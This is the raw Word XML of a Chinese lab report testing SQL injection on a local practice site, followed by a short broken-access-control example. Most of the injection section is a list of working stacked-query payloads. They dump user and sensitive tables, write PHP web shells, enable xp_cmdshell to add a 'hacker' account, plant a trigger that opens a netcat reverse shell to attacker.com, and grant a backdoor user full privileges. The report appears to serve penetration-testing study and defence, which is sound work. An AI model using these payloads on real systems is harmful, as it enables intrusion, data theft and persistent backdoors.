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6C9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Sql注入漏洞测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108F2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这里主要测试几个特别的sql漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128A48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简单漏洞可以用手动或者/自动的方法轻松获取数据库数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D929F">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="12344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F9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主要测试4.3.3后面的漏洞并详细分析其代码与方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125C6C0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堆叠查询注入:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E46BFA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首先测试注入点发现存在,闭合方式为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F128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可以使用bool盲注 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A0C6D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http://localhost/4.3/pdo.php?id=1%27and%271%27=%271%27--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不同and值返回页面不同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD89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存在union注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22285C32">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="718185"/>
            <wp:effectExtent l="0" t="0" r="889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1F0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知道了闭合方式,闭合1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使用堆叠查询发现存在漏洞:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0D17D">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="75692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985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加载时间为5,后面任意语句可以被执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3DFB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目标代码返回值只能返回第一条语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774399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所以要用sleep() 来测试其漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AED27C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1827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后面可以执行任意语句;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B204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数据提取:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F3E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INSERT INTO attacker_table SELECT * FROM users; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186273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CREATE TABLE dump_data AS SELECT * FROM sensitive_table; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F035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提权:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED5B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SET GLOBAL general_log_file='/var/www/html/shell.php'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D90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SET GLOBAL general_log='on'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B325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SELECT '&lt;?php system($_GET[cmd]); ?&gt;' INTO OUTFILE '/var/www/shell.php'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06F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EXEC sp_configure 'show advanced options', 1; RECONFIGURE; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2456E8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EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECADB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EXEC xp_cmdshell 'net user hacker P@ssw0rd /add'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF146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持久化:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41420E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CREATE TRIGGER backdoor AFTER INSERT ON users FOR EACH ROW BEGIN SYSTEM 'nc -e /bin/sh attacker.com 4444'; END; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C567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CREATE USER 'hacker'@'%' IDENTIFIED BY 'password'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C76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'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52713FCA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F7F4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堆叠注入是一种高危但受环境限制的技术，理解其原理和限制条件对于渗透测试和防御都至关重要。在授权测试中，它可以揭示系统最严重的漏洞；在防御方面，必须采取严格措施防止此类攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8D1AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9768C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越权漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA5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这是一个简单的越权漏洞,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E269F86">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="14859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32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用户登录后显示用户信息时是直接查询的,没有权限设置,直接登录改变URL完成越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412AC20">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2210435"/>
            <wp:effectExtent l="0" t="0" r="762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013F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50B01"/>
    <w:rsid w:val="1F612DBB"/>
    <w:rsid w:val="1FBC7761"/>
    <w:rsid w:val="43BD07B0"/>
    <w:rsid w:val="51AD3554"/>
    <w:rsid w:val="60AA6A83"/>
    <w:rsid w:val="673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customStyle="1" w:styleId="8">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:fill="F9FAF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460</Words>
  <Characters>1042</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>141</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1134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2025-05-21T05:18:00Z</dcterms:created>
  <dc:creator>童春林</dc:creator>
  <cp:lastModifiedBy>aaa</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-05T14:23:07Z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C2F83F56F8E9455D84D9C878DE9D2E6D_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMTM3NDk0ZTIyZTk2MmJlNDc2YzE3M2M3MGVmNGZjMDIiLCJ1c2VySWQiOiI2ODY3MzgyNTMifQ==</vt:lpwstr>
  </property>
</Properties>
</file>